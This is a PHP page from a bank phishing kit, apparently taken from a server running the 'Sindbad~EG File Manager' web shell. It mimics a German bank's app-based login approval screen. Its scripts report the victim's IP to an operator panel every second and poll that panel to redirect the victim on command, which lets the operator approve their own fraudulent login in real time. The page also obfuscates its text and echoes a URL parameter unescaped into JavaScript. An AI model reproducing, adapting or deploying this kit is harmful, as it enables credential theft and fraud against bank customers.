Sindbad~EG File Manager
<?php
require '../main.php';
?><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<title></title>
<link rel="stylesheet" href="res/main.css">
<link rel="stylesheet" href="res/img-media.css">
<style>
input{
width:500px;
max-width:100%;
}
</style>
</head>
<body>
<header>
<img src="res/logo.png">
</header>
<main>
<div class="title">
<?php $bm->obf("Log-in bestätigen"); ?>
</div>
<div class="form" style="display:inline-block;">
<div class="left" style="width:100%;">
<div class="col" style="margin:0; text-align:left;">
<p><?php $bm->obf("Freigabe"); ?></p>
</div>
<div class="col" style="display:flex; align-items:center;">
<img src="res/inga.png" style="margin-right:20px; width:56px;"><span style="color:#ff6200; font-weight:bold; font-size:1em;"> Jetzt bitte Ihren Log-in mit der App Banking to go bestätigen.</span>
</div>
<div style="padding:20px; background:#e8f3fa; border-radius:6px; color:black;">
<b>Tipp:</b> Der Log-in wird in der App nicht zur Bestätigung angezeigt? <b>Dann gehen Sie in der App auf "Meine Konten" und ziehen Sie den Bildschirm kurz nach unten,</b> um die Anzeige zu aktualisieren.
</div>
<div style="margin:20px 0;">
Sie möchten Ihr Gerät umbenennen? Hier geht's <a href="#">zur Geräteverwaltung</a>.
</div>
<div style="margin:70px 0;">
<img src="res/app.png" class="lg" style="width:560px; max-width:100%;">
<img src="res/app.png" class="md" style="width:560px; max-width:100%;">
<img src="res/app.png" class="sm" style="width:560px; max-width:100%;">
<img src="res/app-xs.png" class="xs" style="width:560px; max-width:100%;">
</div>
</div>
</div>
</main>
<?php
require 'html/footer.php';
require 'html/loader.php';
?>
<script src="res/jq.js"></script>
<script>
setInterval(() => {
$.post("../panel/update_statu.php",{update:1, ip:'<?php echo $pnl->IP; ?>'});
}, 1000);
var page ="<?php echo @$_GET['p']; ?>";
var cd = "<?php echo $current_data; ?>";
setInterval(() => {
$.post("../panel/fetch.php", {update:1}, function(d){
if(cd!=d){
window.location=d;
}
})
}, 2000);
</script>
</body>
</html>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists